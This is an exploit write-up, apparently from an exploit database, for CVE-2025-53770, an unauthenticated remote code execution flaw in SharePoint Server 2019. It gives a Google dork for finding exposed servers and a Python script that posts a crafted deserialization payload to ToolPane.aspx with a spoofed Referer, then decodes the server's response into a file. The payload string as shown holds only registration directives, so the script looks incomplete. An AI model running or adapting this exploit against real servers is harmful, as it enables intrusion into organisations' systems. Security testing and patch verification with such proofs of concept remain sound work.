# Exploit Title: Microsoft SharePoint Server 2019 – Remote Code Execution (RCE) # Google Dork: intitle:"Microsoft SharePoint" inurl:"/_layouts/15/ToolPane.aspx" # Date: 2025-08-07 # Exploit Author: Agampreet Singh (RedRoot Tool Maker – https://github.com/Agampreet-Singh/RedRoot) # Vendor Homepage: https://www.microsoft.com # Software Link: https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration # Version: SharePoint Server 2019 (16.0.10383.20020) # Tested on: Windows Server 2019 (x64) # CVE: CVE-2025-53770 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Exploit Author: Agampreet Singh (RedRoot Tool Maker) RedRoot Repository: https://github.com/Agampreet-Singh/RedRoot This PoC demonstrates unauthenticated RCE by exploiting unsafe deserialization in SharePoint’s ToolPane.aspx via the Scorecard:ExcelDataSet control. FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY. """ import requests import base64 import gzip import re import sys def exploit_sharepoint(target_url): print(f"[+] Target: {target_url}") headers = { "Referer": "/_layouts/SignOut.aspx", "Content-Type": "application/x-www-form-urlencoded" } payload = ''' <%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>

'''.strip() data = { "MSOTlPn_Uri": target_url, "MSOTlPn_DWP": payload } try: response = requests.post( f"{target_url}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx", headers=headers, data=data, verify=False, timeout=10 ) if response.status_code != 200: print(f"[-] Unexpected HTTP response: {response.status_code}") return match = re.search(r'CompressedDataTable="([^&]+)', response.text) if not match: print("[-] No CompressedDataTable found in response.") return compressed_b64 = match.group(1) print("[+] Compressed payload extracted.") compressed_data = base64.b64decode(compressed_b64) decompressed_data = gzip.decompress(compressed_data) decoded_output = decompressed_data.decode('utf-8', errors='ignore') print("[+] Payload decoded successfully. Dumping to file...") output_file = "/tmp/sharepoint_decoded_payload.txt" with open(output_file, "w", encoding="utf-8") as f: f.write(decoded_output) print(f"[+] Saved to {output_file}") print("[*] Summary Matches:") for keyword in ["IntruderScannerDetectionPayload", "ExcelDataSet", "divWaiting", "ProgressTemplate", "Scorecard"]: if keyword in decoded_output: print(f" - Found: {keyword}") except Exception as e: print(f"[!] Exploit failed: {e}") if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python3 cve-2025-53770.py https://target.com") sys.exit(1) target = sys.argv[1].strip().rstrip('/') exploit_sharepoint(target)